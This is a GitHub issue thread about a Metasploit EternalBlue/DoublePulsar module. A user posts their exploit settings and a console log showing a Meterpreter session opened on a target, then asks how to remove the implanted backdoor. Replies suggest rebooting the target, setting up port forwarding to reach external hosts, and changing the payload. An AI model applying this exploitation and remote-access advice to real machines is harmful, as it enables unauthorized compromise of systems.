search

Telefonica / Eternalblue-Doublepulsar-Metasploit

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
GNU Lesser General Public License v2.1
1.09k stars 520 forks source link

Eternalblue Double Pulsar - Remove Backdoor #80

Open zeldp opened 6 years ago

zeldp commented 6 years ago

Hi,

Can anyone please let me know how can I remove the backdoor that has been installed. I used eternal blue double pulsar exploit and payload windows/x64/meterpreter/bind_tcp. Process inject - lsass.exe Target Architecture - x64 DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/

[] Started bind handler [] x.x.x.x:445 - Generating Eternalblue XML data [] x.x.x.x:445 - Generating Doublepulsar XML data [] x.x.x.x:445 - Generating payload DLL for Doublepulsar [] x.x.x.x:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] x.x.x.x:445 - Launching Eternalblue... 000f:err:service:process_send_command receiving command result timed out [+] x.x.x.x:445 - Backdoor is already installed [] x.x.x.x:445 - Launching Doublepulsar... 000f:err:service:process_send_command receiving command result timed out [] Sending stage (206403 bytes) to 10.136.8.13 [*] Meterpreter session 2 opened (x.x.x.x:44911 -> x.x.x.x.13:4444) at 2018-07-13 12:35:02 -0400 0015:err:service:process_send_command receiving command result timed out 002b:err:plugplay:handle_bus_relations Failed to load driver L"WineHID" [+] x.x.x.x:445 - Remote code executed... 3... 2... 1...

Thank you.

ronviajero commented 6 years ago

I'm having the same issue... how do you resolve this?

avacs commented 6 years ago

I'm also having the same issue..

tihon49 commented 6 years ago

So.... how to fix it?

davideo777 commented 5 years ago

It this problem resolved ?

landmorew commented 5 years ago

reboot the target host. Since it resides in memory, just rebooting the machine should be enough to clear out your previous backdoor

peterpt commented 5 years ago

you all should know that this ruby script can not exploit an external target using its lan ip because the payload on target will connect to the ip configured on you lhost witch is the lan ip . You should use a modem to run this plugin , this way you will get an ISP dhcp release witch is not the range of lan ips , basically is a direct external ip 212.xxx.xxx.xxx instead 192.168.xxx.xxx . In alternative a port forward should be setup on your router to forward all wan packets to your linux lan ip .

GetRektBoy724 commented 3 years ago

And try to not using the bind_tcp payload